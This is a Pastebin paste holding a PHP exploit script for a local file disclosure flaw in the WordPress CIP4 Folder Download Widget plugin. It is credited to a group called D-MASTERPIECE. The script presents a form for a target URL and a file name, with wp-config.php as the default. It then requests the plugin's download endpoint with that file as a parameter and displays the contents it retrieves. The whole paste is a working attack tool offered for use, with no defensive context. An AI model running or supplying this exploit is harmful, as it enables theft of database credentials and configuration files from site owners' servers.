Advertisement
andripzf

Exploit WP | Exploit Wordpress | CIP4 Folder | LFD Vulnerable

Jan 22nd, 2015
887
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.28 KB | None | 0 0
  1. <form method="GET">
  2. URL : <input type="text" name="url" size="40"><br>
  3. FILE : <input type="text" name="file" size="40" value="wp-config.php"><br>
  4. <input type="submit" name="dm" value="exploit"><br><br>
  5. </form>
  6. <hr>
  7. <?php
  8. /**
  9.  
  10. DM | D-MASTERPIECE
  11. Author Script Exploiter : www.facebook.com/PeZeEf
  12. FB Group : www.facebook.com/groups/D.MASTERPIECE
  13. Release Script Date : 21 / 01 /2015
  14. Release Script View :  https://m.facebook.com/groups/192316047565078?view=permalink&id=609653452498000&_rdr
  15.  
  16. **/
  17.  
  18. if(isset($_GET['url']) && !empty($_GET['url'])){
  19. $url = $_GET['url'];
  20. $file = $_GET['file'];
  21. $fp = fopen("cookie.txt", "w+");
  22. $Cookie = realpath('cookie.txt');
  23. $request = "?target=$file&info=$file";
  24. $web = $url."/wp-content/plugins/cip4-folder-download-widget/cip4-download.php".$request;
  25. $curl=curl_init();
  26. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  27. curl_setopt($curl,CURLOPT_URL,"$web");
  28. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
  29. curl_setopt($curl,CURLOPT_SSL_VERIFYPEER, false);
  30. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  31. curl_setopt($curl,CURLOPT_COOKIEFILE, "$Cookie");
  32. curl_setopt($curl,CURLOPT_TIMEOUT,5);
  33. $gweb = curl_exec($curl);
  34. echo '<textarea rows="30" cols="50">'.htmlentities($gweb).'</textarea>';
  35. }
  36. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement